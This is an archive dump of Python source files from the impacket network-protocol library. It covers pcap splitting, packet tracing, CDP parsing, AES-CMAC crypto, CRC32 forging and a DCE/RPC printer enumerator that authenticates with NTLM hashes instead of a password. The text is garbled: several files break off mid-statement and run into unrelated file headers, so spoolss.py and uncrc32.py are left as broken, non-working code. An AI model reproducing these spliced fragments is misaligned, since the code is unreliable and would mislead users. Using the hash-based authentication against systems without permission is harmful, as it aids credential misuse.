impacket-0.9.10/examples/split.py0000600000076500000240000001062512141750576017001 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: split.py 17 2003-10-27 17:36:57Z jkohen $ # # Pcap dump splitter. # # This tools splits pcap capture files into smaller ones, one for each # different TCP/IP connection found in the original. # # Authors: # Alejandro D. Weil # Javier Kohen # # Reference for: # pcapy: open_offline, pcapdumper. # ImpactDecoder. import sys import string from exceptions import Exception from threading import Thread import pcapy from pcapy import open_offline import impacket from impacket.ImpactDecoder import EthDecoder, LinuxSLLDecoder class Connection: """This class can be used as a key in a dictionary to select a connection given a pair of peers. Two connections are considered the same if both peers are equal, despite the order in which they were passed to the class constructor. """ def __init__(self, p1, p2): """This constructor takes two tuples, one for each peer. The first element in each tuple is the IP address as a string, and the second is the port as an integer. """ self.p1 = p1 self.p2 = p2 def getFilename(self): """Utility function that returns a filename composed by the IP addresses and ports of both peers. """ return '%s.%d-%s.%d.pcap'%(self.p1[0],self.p1[1],self.p2[0],self.p2[1]) def __cmp__(self, other): if ((self.p1 == other.p1 and self.p2 == other.p2) or (self.p1 == other.p2 and self.p2 == other.p1)): return 0 else: return -1 def __hash__(self): return (hash(self.p1[0]) ^ hash(self.p1[1]) ^ hash(self.p2[0]) ^ hash(self.p2[1])) class Decoder: def __init__(self, pcapObj): # Query the type of the link and instantiate a decoder accordingly. datalink = pcapObj.datalink() if pcapy.DLT_EN10MB == datalink: self.decoder = EthDecoder() elif pcapy.DLT_LINUX_SLL == datalink: self.decoder = LinuxSLLDecoder() else: raise Exception("Datalink type not supported: " % datalink) self.pcap = pcapObj self.connections = {} def start(self): # Sniff ad infinitum. # PacketHandler shall be invoked by pcap for every packet. self.pcap.loop(0, self.packetHandler) def packetHandler(self, hdr, data): """Handles an incoming pcap packet. This method only knows how to recognize TCP/IP connections. Be sure that only TCP packets are passed onto this handler (or fix the code to ignore the others). Setting r"ip proto \tcp" as part of the pcap filter expression suffices, and there shouldn't be any problem combining that with other expressions. """ # Use the ImpactDecoder to turn the rawpacket into a hierarchy # of ImpactPacket instances. p = self.decoder.decode(data) ip = p.child() tcp = ip.child() # Build a distinctive key for this pair of peers. src = (ip.get_ip_src(), tcp.get_th_sport() ) dst = (ip.get_ip_dst(), tcp.get_th_dport() ) con = Connection(src,dst) # If there isn't an entry associated yetwith this connection, # open a new pcapdumper and create an association. if not self.connections.has_key(con): fn = con.getFilename() print "Found a new connection, storing into:", fn try: dumper = self.pcap.dump_open(fn) except pcapy.PcapError, e: print "Can't write packet to:", fn return self.connections[con] = dumper # Write the packet to the corresponding file. self.connections[con].dump(hdr, data) def main(filename): # Open file p = open_offline(filename) # At the moment the callback only accepts TCP/IP packets. p.setfilter(r'ip proto \tcp') print "Reading from %s: linktype=%d" % (filename, p.datalink()) # Start decoding process. Decoder(p).start() # Process command-line arguments. if __name__ == '__main__': if len(sys.argv) <= 1: print "Usage: %s " % sys.argv[0] sys.exit(1) main(sys.argv[1]) impacket-0.9.10/examples/spoolss.py0000600000076500000240000001057612141750576017355 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: spoolss.py 600 2012-07-11 19:39:46Z bethus@gmail.com $ # # SPOOLSS example for some functions implemented # # Author: # Alberto Solino (bethus@gmail.com) # # Reference for: # DCE/RPC for SPOOLSS import socket import string import sys import types from impacket import uuid, ntlm, version from impacket.dcerpc import dcerpc_v4, dcerpc, transport, printer from struct import unpack import argparse class SPOOLSS: KNOWN_PROTOCOLS = { '139/SMB': (r'ncacn_np:%s[\pipe\spoolss]', 139), '445/SMB': (r'ncacn_np:%s[\pipe\spoolss]', 445), } def __init__(self, username, password, domain, hashes, protocols): if not protocols: protocols = SPOOLSS.KNOWN_PROTOCOLS.keys() self.__username = username self.__password = password self.__protocols = [protocols] self.__domain = domain self.__lmhash = '' self.__nthash = '' if hashes is not None: self.__lmhash, self.__nthash = hashes.split(':') def play(self, addr): # Try all requested protocols until one works. entries = [] for protocol in self.__protocols: protodef = SPOOLSS.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: entries = self.doStuff(rpctransport) except Exception, e: print 'Protocol failed: %s' % e else: # Got a response. No need for further iterations. break def doStuff(self, rpctransport): dce = dcerpc.DCERPC_v5(rpctransport) dce.connect() dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY) #dce.set_max_fragment_size(16) dce.bind(printer.MSRPC_UUID_SPOOLSS) rpcspool = printer.PrintSpooler(dce) resp = rpcspool.enumPrinters('\x00',0x2, level=1) data = resp['PrinterEnum'] index = 0 for i in range(resp['cReturned']): # skip the flags flags = unpack(' # Javier Kohen # # Reference for: # pcapy: findalldevs, open_live. # ImpactPacket. # ImpactDecoder. ## Some tunable variables follow. # Period (in ms.) to wait between pcap polls. POLL_PERIOD = 250 # Period (in ms.) to wait between screen refreshes. REFRESH_PERIOD = 1000 # Refresh screen after receiving new packets. # You might want to turn off fast_draws if it consumes too much CPU, # for instance, when used under X-Window over a network link. fast_draws = 1 ## End of user configurable section. import os import socket import sys import time import Tkinter from Tkconstants import * import pcapy from pcapy import open_live, findalldevs, PcapError import impacket from impacket import ImpactPacket from impacket.ImpactDecoder import EthDecoder, LinuxSLLDecoder class NumericAxis: def __init__(self,canvas,name,low=0,high=0,direction='vertical'): self.canvas = canvas self.name = name self.setLowerLimit(low) self.setHigherLimit(high) self.direction = direction def screenLength(self): if self.direction == 'vertical': return (self.canvas.winfo_height())-10 else: return (self.canvas.winfo_width())-10 def scaleLength(self): delta = self.getHigherLimit()-self.getLowerLimit() if not delta: delta += 1 return delta def unscale(self,coord): return int((coord-5)*self.scaleLength()/self.screenLength()+self.getLowerLimit()) def scale(self,value): return (value-self.getLowerLimit())*self.screenLength()/self.scaleLength()+5 def setLowerLimit(self,limit): if not limit == None: self._lowerLimit = limit def setHigherLimit(self,limit): if not limit == None: self._higherLimit = limit def getLowerLimit(self): return self._lowerLimit def getHigherLimit(self): return self._higherLimit def addValue(self,value): if self.getLowerLimit() > value: self.setLowerLimit(value) if self.getHigherLimit() < value: self.setHigherLimit(value) class SymbolicAxis(NumericAxis): def __init__(self,canvas,name,values=[],direction = 'vertical'): NumericAxis.__init__(self,canvas,name,0,len(values)-1,direction) self.values = list(values) def addValue(self,value,sort = 1): try: self.values.index(value) return except: None self.values.append(value) if sort: self.values.sort() self.setHigherLimit(len(self.getValues())-1) def unscale(self,value): try: i = NumericAxis.unscale(self, value) if i < 0: return None return self.getValues()[i] except Exception,e: return None def scale(self,value): try: return NumericAxis.scale(self,self.getValues().index(value)) except: self.addValue(value) return NumericAxis.scale(self,self.values.index(value)) def getValues(self): return self.values class ParallelCoordinates(Tkinter.Canvas): def __init__(self, master=None, cnf={}, **kw): apply(Tkinter.Canvas.__init__, (self, master, cnf), kw) self.lastSelection = None self.lastSelectionOval = None self._onSelection = None self.minColor = None self.maxColor = None self.colorAxis = '_counter' self.values=[] self.mainAxis=SymbolicAxis(self,'mainAxis',[],'horizontal') master.bind('',self.draw) master.bind('',self.buttonDown) master.bind('<1>',self.buttonDown) master.bind('',self.buttonUp) def addAxis(self,axis): self.mainAxis.addValue(axis,0) def sameValue(self,a,b): for axis in self.mainAxis.getValues(): if not a[axis.name] == b[axis.name]: return 0 return 1 def addValue(self,value): for each in self.values: if self.sameValue(value,each): each['_counter'] += 1 each['timestamp'] = value['timestamp'] value = each break else: value['_counter'] = 1 for axis in self.mainAxis.getValues(): axis.addValue(value[axis.name]) self.values.append(value) color = value[self.colorAxis] if None == self.minColor or self.minColor > color: self.minColor = color if None == self.maxColor or self.maxColor < color: self.maxColor = color def removeValue(self, value): self.values.remove(value) def basicColor(self,val,fade = 1): # color scale is linear going through green -> yellow -> red # (lower to higher) if val < 0.5: val += val # val *= 2 (scale from 0 to 1) # between green - yellow red = 64*(1-val) + 255*val green = 200*(1-val) + 255*val blue = 64*(1-val) + 0 else: val -= 0.5 val += val red = 255*(1-val) + 255*val green = 255*(1-val) + 64*val blue = 0 + 0 return '#%02x%02x%02x' % (int(red*fade), int(green*fade), int(blue*fade)) def fade(self,value): return max(0,(120.0-time.time()+value['timestamp'])/120.0) def color(self,value,fade = 1): # color scale is linear going through green -> yellow -> red (lower to higher) val = float(value[self.colorAxis]-self.minColor)/(self.maxColor-self.minColor+1) return self.basicColor(val,fade) def drawValueLine(self,value): x = -1 y = -1 fade = self.fade(value) if not fade: self.removeValue(value) return color = self.color(value,fade) for axis in self.mainAxis.getValues(): px = x py = y x = self.mainAxis.scale(axis) y = axis.scale(value[axis.name]) if not px == -1: self.create_line(px,py,x,y,fill = color) def draw(self,event = None): # draw axis for i in self.find_all(): self.delete(i) for axis in self.mainAxis.getValues(): x = self.mainAxis.scale(axis) self.create_line(x,5,x,int(self.winfo_height())-5,fill = 'white') for value in self.values: self.drawValueLine(value) # draw color range # for i in range(200): # c = self.basicColor((i+0.0)/200) # self.create_line(0,i,100,i,fill = c) def buttonDown(self,event): if (event.state & 0x0100) or (event.type == '4'): axis = self.mainAxis.unscale(event.x) if not axis: return element = axis.unscale(event.y) if not element: return x = self.mainAxis.scale(axis) y = axis.scale(element) if self.lastSelectionOval: self.delete(self.lastSelectionOval) self.lastSelectionOval = self.create_oval(x-3,y-3,x+3,y+3,fill = "yellow") if not self.lastSelection == (axis,element): self.lastSelection = (axis,element) if self._onSelection: self._onSelection(self.lastSelection) def buttonUp(self,event): if self.lastSelectionOval: self.delete(self.lastSelectionOval) self.lastSelectionOval = None self.lastSelection = None if self._onSelection: self._onSelection(None) def onSelection(self,_onSelection): self._onSelection = _onSelection class Tracer: def __init__(self, interface = 'eth0', filter = ''): print "Tracing interface %s with filter `%s'." % (interface, filter) self.tk = Tkinter.Tk() self.pc = ParallelCoordinates(self.tk,background = "black") self.pc.pack(expand=1, fill="both") self.status = Tkinter.Label(self.tk) self.status.pack() self.tk.tkraise() self.tk.title('Personal SIDRA (IP-Tracer)') self.pc.addAxis(NumericAxis(self.pc, 'proto',256)) self.pc.addAxis(SymbolicAxis(self.pc,'shost')) self.pc.addAxis(SymbolicAxis(self.pc,'sport')) self.pc.addAxis(SymbolicAxis(self.pc,'dport')) self.pc.addAxis(SymbolicAxis(self.pc,'dhost')) self.pc.onSelection(self.newSelection) self.interface = interface self.filter = filter def timerDraw(self,event = None): self.pc.draw() self.tk.after(REFRESH_PERIOD, self.timerDraw); def start(self): self.p = open_live(self.interface, 1600, 0, 100) ## self.p.setnonblock(1) if self.filter: self.p.setfilter(self.filter) # Query the type of the link and instantiate a decoder accordingly. datalink = self.p.datalink() if pcapy.DLT_EN10MB == datalink: self.decoder = EthDecoder() elif pcapy.DLT_LINUX_SLL == datalink: self.decoder = LinuxSLLDecoder() else: raise Exception("Datalink type not supported: " % datalink) self.tk.after(POLL_PERIOD, self.poll) self.tk.after(REFRESH_PERIOD, self.timerDraw); self.tk.bind('q',self.quit) self.tk.mainloop() def quit(self,event): self.tk.quit() def poll(self,event = None): self.tk.after(POLL_PERIOD, self.poll) received = 0 while 1: try: hdr, data = self.p.next() except PcapError, e: break self.newPacket(hdr.getcaplen(), data, hdr.getts()[0]) received = 1 if received and fast_draws: self.pc.draw() def newPacket(self, len, data, timestamp): try: p = self.decoder.decode(data) except Exception, e: pass value = {} try: value['timestamp']=timestamp value['shost']=p.child().get_ip_src() value['dhost']=p.child().get_ip_dst() value['proto']=p.child().child().protocol value['sport']=-1 value['dport']=-1 except: return try: if value['proto'] == socket.IPPROTO_TCP: value['dport']=p.child().child().get_th_dport() value['sport']=p.child().child().get_th_sport() elif value['proto'] == socket.IPPROTO_UDP: value['dport']=p.child().child().get_uh_dport() value['sport']=p.child().child().get_uh_sport() except: pass self.pc.addValue(value) def setStatus(self,status): self.status.configure(text = status) def newSelection(self, selection): if selection: self.setStatus('%s:%s' % (selection[0].name, selection[1])) else: self.setStatus('') def getInterfaces(): # Grab a list of interfaces that pcap is able to listen on. # The current user will be able to listen from all returned interfaces, # using open_live to open them. ifs = findalldevs() # No interfaces available, abort. if 0 == len(ifs): return "You don't have enough permissions to open any interface on this system." return ifs def printUsage(): print """Usage: %s [interface [filter]] Interface is the name of a local network interface, see the list of available interfaces below. Filter is a BPF filter, as described in tcpdump(3)'s man page. Available interfaces for this user: %s """ % (sys.argv[0], getInterfaces()) def main(): if len(sys.argv) == 1: printUsage() graph = Tracer() elif len(sys.argv) == 2: graph = Tracer(sys.argv[1]) elif len(sys.argv) == 3: graph = Tracer(sys.argv[1],sys.argv[2]) else: printUsage() sys.exit(1) graph.start() main() impacket-0.9.10/examples/uncrc32.py0000600000076500000240000000171712141750576017127 0ustar betostaff00000000000000# based on: # # Reversing CRC - Theory and Practice. # HU Berlin Public Report # SAR-PR-2006-05 # May 2006 # Authors: # Martin Stigge, Henryk Plotz, Wolf Muller, Jens-Peter Redlich FINALXOR = 0xffffffffL INITXOR = 0xffffffffL CRCPOLY = 0xEDB88320L CRCINV = 0x5B358FD3L from binascii import crc32 from struct import pack def tableAt(byte): return crc32(chr(byte ^ 0xff)) & 0xffffffff ^ FINALXOR ^ (INITXOR >> 8) def compensate(buf, wanted): wanted ^= FINALXOR newBits = 0 for i in range(32): if newBits & 1: newBits >>= 1 newBits ^= CRCPOLY else: newBits >>= 1 if wanted & 1: newBits ^= CRCINV wanted >>= 1 newBits ^= crc32(buf) ^ FINALXOR return pack(' 0 self._transparent_bridge = (capabilities & 0x02) > 0 self._source_route_bridge = (capabilities & 0x04) > 0 self._switch = (capabilities & 0x08) > 0 self._host = (capabilities & 0x10) > 0 self._igmp_capable = (capabilities & 0x20) > 0 self._repeater = (capabilities & 0x40) > 0 def is_router(self): return self._router def is_transparent_bridge(self): return self._transparent_bridge def is_source_route_bridge(self): return self._source_route_bridge def is_switch(self): return self._switch def is_host(self): return self.is_host def is_igmp_capable(self): return self._igmp_capable def is_repeater(self): return self._repeater def __str__(self): return "Capabilities:" + self.get_capabilities() class SoftVersion(CDPElement): Type = 5 def get_type(self): return SoftVersion.Type def get_version(self): return CDPElement.get_data(self) def __str__(self): return "Version:" + self.get_version() class Platform(CDPElement): Type = 6 def get_type(self): return Platform.Type def get_platform(self): return CDPElement.get_data(self) def __str__(self): return "Platform:%r" % self.get_platform() class IpPrefix(CDPElement): Type = 7 def get_type(self): return IpPrefix .Type def get_ip_prefix(self): return CDPElement.get_ip_address(self, 4) def get_bits(self): return self.get_byte(8) def __str__(self): return "IP Prefix/Gateway: %r/%d" % (self.get_ip_prefix(), self.get_bits()) class ProtocolHello(CDPElement): Type = 8 def get_type(self): return ProtocolHello.Type def get_master_ip(self): return self.get_ip_address(9) def get_version(self): return self.get_byte(17) def get_sub_version(self): return self.get_byte(18) def get_status(self): return self.get_byte(19) def get_cluster_command_mac(self): return self.get_bytes().tostring()[20:20+6] def get_switch_mac(self): return self.get_bytes().tostring()[28:28+6] def get_management_vlan(self): return self.get_word(36) def __str__(self): return "\n\n\nProcolHello: Master IP:%s version:%r subversion:%r status:%r Switch's Mac:%r Management VLAN:%r" \ % (self.get_master_ip(), self.get_version(), self.get_sub_version(), self.get_status(), mac_to_string(self.get_switch_mac()), self.get_management_vlan()) class VTPManagementDomain(CDPElement): Type = 9 def get_type(self): return VTPManagementDomain.Type def get_domain(self): return CDPElement.get_data(self) class Duplex(CDPElement): Type = 0xb def get_type(self): return Duplex.Type def get_duplex(self): return CDPElement.get_data(self) def is_full_duplex(self): return self.get_duplex()==0x1 class VLAN(CDPElement): Type = 0xa def get_type(self): return VLAN.Type def get_vlan_number(self): return CDPElement.get_data(self) class TrustBitmap(CDPElement): Type = 0x12 def get_type(self): return TrustBitmap.Type def get_trust_bitmap(self): return self.get_data() def __str__(self): return "TrustBitmap Trust Bitmap:%r" % self.get_trust_bitmap() class UntrustedPortCoS(CDPElement): Type = 0x13 def get_type(self): return UntrustedPortCoS.Type def get_port_CoS(self): return self.get_data() def __str__(self): return "UntrustedPortCoS port CoS %r" % self.get_port_CoS() class ManagementAddresses(Address): Type = 0x16 def get_type(self): return ManagementAddresses.Type class MTU(CDPElement): Type = 0x11 def get_type(self): return MTU.Type class SystemName(CDPElement): Type = 0x14 def get_type(self): return SystemName.Type class SystemObjectId(CDPElement): Type = 0x15 def get_type(self): return SystemObjectId.Type class SnmpLocation(CDPElement): Type = 0x17 def get_type(self): return SnmpLocation.Type class DummyCdpElement(CDPElement): Type = 0x99 def get_type(self): return DummyCdpElement.Type class CDPElementFactory(): elementTypeMap = { CDPDevice.Type : CDPDevice, Port.Type : Port, Capabilities.Type : Capabilities, Address.Type : Address, SoftVersion.Type : SoftVersion, Platform.Type : Platform, IpPrefix.Type : IpPrefix, ProtocolHello.Type : ProtocolHello, VTPManagementDomain.Type : VTPManagementDomain, VLAN.Type : VLAN, Duplex.Type : Duplex, TrustBitmap.Type : TrustBitmap, UntrustedPortCoS.Type : UntrustedPortCoS, ManagementAddresses.Type : ManagementAddresses, MTU.Type : MTU, SystemName.Type : SystemName, SystemObjectId.Type : SystemObjectId, SnmpLocation.Type : SnmpLocation } @classmethod def create(cls, aBuffer): # print "CDPElementFactory.create aBuffer:", repr(aBuffer) # print "CDPElementFactory.create sub_type:", repr(aBuffer[0:2]) _type = unpack("!h", aBuffer[0:2])[0] # print "CDPElementFactory.create _type:", _type try: class_type = cls.elementTypeMap[_type] except KeyError: class_type = DummyCdpElement #raise Exception("CDP Element type %s not implemented" % _type) return class_type( aBuffer ) impacket-0.9.10/impacket/crypto.py0000600000076500000240000003467312141750575017155 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies) # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: crypto.py 673 2012-08-17 01:04:03Z bethus@gmail.com $ # # Author: Alberto Solino (beto@coresecurity.com) # # Description: # RFC 4493 implementation (http://www.ietf.org/rfc/rfc4493.txt) # RFC 4615 implementation (http://www.ietf.org/rfc/rfc4615.txt) # # NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 implementation # (http://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108) # import Crypto from Crypto.Cipher import AES from struct import pack, unpack import hmac, hashlib def Generate_Subkey(K): # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # + Algorithm Generate_Subkey + # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # + + # + Input : K (128-bit key) + # + Output : K1 (128-bit first subkey) + # + K2 (128-bit second subkey) + # +-------------------------------------------------------------------+ # + + # + Constants: const_Zero is 0x00000000000000000000000000000000 + # + const_Rb is 0x00000000000000000000000000000087 + # + Variables: L for output of AES-128 applied to 0^128 + # + + # + Step 1. L := AES-128(K, const_Zero); + # + Step 2. if MSB(L) is equal to 0 + # + then K1 := L << 1; + # + else K1 := (L << 1) XOR const_Rb; + # + Step 3. if MSB(K1) is equal to 0 + # + then K2 := K1 << 1; + # + else K2 := (K1 << 1) XOR const_Rb; + # + Step 4. return K1, K2; + # + + # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ AES_128 = AES.new(K) L = AES_128.encrypt('\x00'*16) LHigh = unpack('>Q',L[:8])[0] LLow = unpack('>Q',L[8:])[0] K1High = ((LHigh << 1) | ( LLow >> 63 )) & 0xFFFFFFFFFFFFFFFF K1Low = (LLow << 1) & 0xFFFFFFFFFFFFFFFF if (LHigh >> 63): K1Low ^= 0x87 K2High = ((K1High << 1) | (K1Low >> 63)) & 0xFFFFFFFFFFFFFFFF K2Low = ((K1Low << 1)) & 0xFFFFFFFFFFFFFFFF if (K1High >> 63): K2Low ^= 0x87 K1 = pack('>QQ', K1High, K1Low) K2 = pack('>QQ', K2High, K2Low) return K1, K2 def XOR_128(N1,N2): J = '' for i in range(len(N1)): J = J + chr(ord(N1[i]) ^ ord(N2[i])) return J def PAD(N): const_Bsize = 16 padLen = 16-len(N) return N + '\x80' + '\x00'*(padLen-1) def AES_CMAC(K, M, length): # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # + Algorithm AES-CMAC + # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # + + # + Input : K ( 128-bit key ) + # + : M ( message to be authenticated ) + # + : len ( length of the message in octets ) + # + Output : T ( message authentication code ) + # + + # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # + Constants: const_Zero is 0x00000000000000000000000000000000 + # + const_Bsize is 16 + # + + # + Variables: K1, K2 for 128-bit subkeys + # + M_i is the i-th block (i=1..ceil(len/const_Bsize)) + # + M_last is the last block xor-ed with K1 or K2 + # + n for number of blocks to be processed + # + r for number of octets of last block + # + flag for denoting if last block is complete or not + # + + # + Step 1. (K1,K2) := Generate_Subkey(K); + # + Step 2. n := ceil(len/const_Bsize); + # + Step 3. if n = 0 + # + then + # + n := 1; + # + flag := false; + # + else + # + if len mod const_Bsize is 0 + # + then flag := true; + # + else flag := false; + # + + # + Step 4. if flag is true + # + then M_last := M_n XOR K1; + # + else M_last := padding(M_n) XOR K2; + # + Step 5. X := const_Zero; + # + Step 6. for i := 1 to n-1 do + # + begin + # + Y := X XOR M_i; + # + X := AES-128(K,Y); + # + end + # + Y := M_last XOR X; + # + T := AES-128(K,Y); + # + Step 7. return T; + # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ const_Bsize = 16 const_Zero = '\x00'*16 AES_128= AES.new(K) M = M[:length] K1, K2 = Generate_Subkey(K) n = len(M)/const_Bsize if n == 0: n = 1 flag = False else: if (length % const_Bsize) == 0: flag = True else: n += 1 flag = False M_n = M[(n-1)*const_Bsize:] if flag is True: M_last = XOR_128(M_n,K1) else: M_last = XOR_128(PAD(M_n),K2) X = const_Zero for i in range(n-1): M_i = M[(i)*const_Bsize:][:16] Y = XOR_128(X, M_i) X = AES_128.encrypt(Y) Y = XOR_128(M_last, X) T = AES_128.encrypt(Y) return T def AES_CMAC_PRF_128(VK, M, VKlen, Mlen): # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # + AES-CMAC-PRF-128 + # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # + + # + Input : VK (Variable-length key) + # + : M (Message, i.e., the input data of the PRF) + # + : VKlen (length of VK in octets) + # + : len (length of M in octets) + # + Output : PRV (128-bit Pseudo-Random Variable) + # + + # +-------------------------------------------------------------------+ # + Variable: K (128-bit key for AES-CMAC) + # + + # + Step 1. If VKlen is equal to 16 + # + Step 1a. then + # + K := VK; + # + Step 1b. else + # + K := AES-CMAC(0^128, VK, VKlen); + # + Step 2. PRV := AES-CMAC(K, M, len); + # + return PRV; + # + + # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ if VKlen == 16: K = VK else: K = AES_CMAC('\x00'*16, VK, VKlen) PRV = AES_CMAC(K, M, Mlen) return PRV def KDF_CounterMode(KI, Label, Context, L): # Implements NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 # http://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108 # Fixed values: # 1. h - The length of the output of the PRF in bits, and # 2. r - The length of the binary representation of the counter i. # Input: KI, Label, Context, and L. # Process: # 1. n := [L/h] # 2. If n > 2r-1, then indicate an error and stop. # 3. result(0):= empty . # 4. For i = 1 to n, do # a. K(i) := PRF (KI, [i]2 || Label || 0x00 || Context || [L]2) # b. result(i) := result(i-1) || K(i). # 5. Return: KO := the leftmost L bits of result(n). h = 256 r = 32 n = L / h if n == 0: n = 1 if n > (pow(2,r)-1): raise "Error computing KDF_CounterMode" result = '' K = '' for i in range(1,n+1): input = pack('>L', i) + Label + '\x00' + Context + pack('>L',L) K = hmac.new(KI, input, hashlib.sha256).digest() result = result + K return result[:(L/8)] if __name__ == '__main__': # Test Vectors # -------------------------------------------------- # Subkey Generation # K 2b7e1516 28aed2a6 abf71588 09cf4f3c # AES-128(key,0) 7df76b0c 1ab899b3 3e42f047 b91b546f # K1 fbeed618 35713366 7c85e08f 7236a8de # K2 f7ddac30 6ae266cc f90bc11e e46d513b # -------------------------------------------------- # # -------------------------------------------------- # Example 1: len = 0 # M # AES-CMAC bb1d6929 e9593728 7fa37d12 9b756746 # -------------------------------------------------- # # Example 2: len = 16 # M 6bc1bee2 2e409f96 e93d7e11 7393172a # AES-CMAC 070a16b4 6b4d4144 f79bdd9d d04a287c # -------------------------------------------------- # # Example 3: len = 40 # M 6bc1bee2 2e409f96 e93d7e11 7393172a # ae2d8a57 1e03ac9c 9eb76fac 45af8e51 # 30c81c46 a35ce411 # AES-CMAC dfa66747 de9ae630 30ca3261 1497c827 # -------------------------------------------------- # # Example 4: len = 64 # M 6bc1bee2 2e409f96 e93d7e11 7393172a # ae2d8a57 1e03ac9c 9eb76fac 45af8e51 # 30c81c46 a35ce411 e5fbc119 1a0a52ef # f69f2445 df4f9b17 ad2b417b e66c3710 # AES-CMAC 51f0bebf 7e3b9d92 fc497417 79363cfe # -------------------------------------------------- def pp(s): for i in range((len(s)/8)): print s[:8] , s = s[8:] return '' from binascii import hexlify, unhexlify K = "2b7e151628aed2a6abf7158809cf4f3c" M = "6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e5130c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710" K1, K2 = Generate_Subkey(unhexlify(K)) print "Subkey Generation" print "K ", pp(K) print "K1 ", pp(hexlify(K1)) print "K2 ", pp(hexlify(K2)) print print "Example 1: len = 0" print "M " print "AES-CMAC " , pp(hexlify(AES_CMAC(unhexlify(K),unhexlify(M),0))) print print "Example 2: len = 16" print "M " , pp(M[:16*2]) print "AES-CMAC " , pp(hexlify(AES_CMAC(unhexlify(K),unhexlify(M),16))) print print "Example 3: len = 40" print "M " , pp(M[:40*2]) print "AES-CMAC " , pp(hexlify(AES_CMAC(unhexlify(K),unhexlify(M),40))) print print "Example 3: len = 64" print "M " , pp(M[:64*2]) print "AES-CMAC " , pp(hexlify(AES_CMAC(unhexlify(K),unhexlify(M),64))) print M = "eeab9ac8fb19cb012849536168b5d6c7a5e6c5b2fcdc32bc29b0e3654078a5129f6be2562046766f93eebf146b" K = "6c3473624099e17ff3a39ff6bdf6cc38" # Mac = dbf63fd93c4296609e2d66bf79251cb5 print "Example 4: len = 45" print "M " , pp(M[:45*2]) print "AES-CMAC " , pp(hexlify(AES_CMAC(unhexlify(K),unhexlify(M),45))) # ------------------------------------------------------------ # # Test Case AES-CMAC-PRF-128 with 20-octet input # Key : 00010203 04050607 08090a0b 0c0d0e0f edcb # Key Length : 18 # Message : 00010203 04050607 08090a0b 0c0d0e0f 10111213 # PRF Output : 84a348a4 a45d235b abfffc0d 2b4da09a # # Test Case AES-CMAC-PRF-128 with 20-octet input # Key : 00010203 04050607 08090a0b 0c0d0e0f # Key Length : 16 # Message : 00010203 04050607 08090a0b 0c0d0e0f 10111213 # PRF Output : 980ae87b 5f4c9c52 14f5b6a8 455e4c2d # # Test Case AES-CMAC-PRF-128 with 20-octet input # Key : 00010203 04050607 0809 # Key Length : 10 # Message : 00010203 04050607 08090a0b 0c0d0e0f 10111213 # PRF Output : 290d9e11 2edb09ee 141fcf64 c0b72f3d # # ------------------------------------------------------------ K = "000102030405060708090a0b0c0d0e0fedcb" M = "000102030405060708090a0b0c0d0e0f10111213" print "AES-CMAC-PRF-128 Test Vectors" print print "Example 1: len = 0" print "M " , pp(K) print "Key Length 18 " print "AES-CMAC " , pp(hexlify(AES_CMAC_PRF_128(unhexlify(K),unhexlify(M),18,len(unhexlify(M))))) print print "Example 1: len = 0" print "M " , pp(K) print "Key Length 16 " print "AES-CMAC " , pp(hexlify(AES_CMAC_PRF_128(unhexlify(K)[:16],unhexlify(M),16,len(unhexlify(M))))) print print "Example 1: len = 0" print "M " , pp(K) print "Key Length 10 " print "AES-CMAC " , pp(hexlify(AES_CMAC_PRF_128(unhexlify(K)[:10],unhexlify(M),10,len(unhexlify(M))))) print impacket-0.9.10/impacket/dcerpc/0000700000076500000240000000000012141751750016500 5ustar betostaff00000000000000impacket-0.9.10/impacket/dcerpc/__init__.py0000600000076500000240000000000512141750575020612 0ustar betostaff00000000000000pass impacket-0.9.10/impacket/dcerpc/atsvc.py0000600000076500000240000001203312141750575020177 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: atsvc.py 555 2012-05-22 03:28:17Z bethus@gmail.com $ # # Author: Alberto Solino # # Description: # ATSVC implementation of some methods [MS-TSCH] # from struct import * from impacket.structure import Structure from impacket import dcerpc from impacket.dcerpc import ndrutils, dcerpc from impacket.uuid import uuidtup_to_bin MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0')) MSRPC_UUID_SASEC = uuidtup_to_bin(('378E52B0-C0A9-11CF-822D-00AA0051E40F', '1.0')) MSRPC_UUID_TSS = uuidtup_to_bin(('86D35949-83C9-4044-B424-DB363231FD0C', '1.0')) # Constants S_OK = 0x00000000 S_FALSE = 0x00000001 E_OUTOFMEMORY = 0x80000002 E_ACCESSDENIED = 0x80000009 E_INVALIDARG = 0x80000003 E_FAIL = 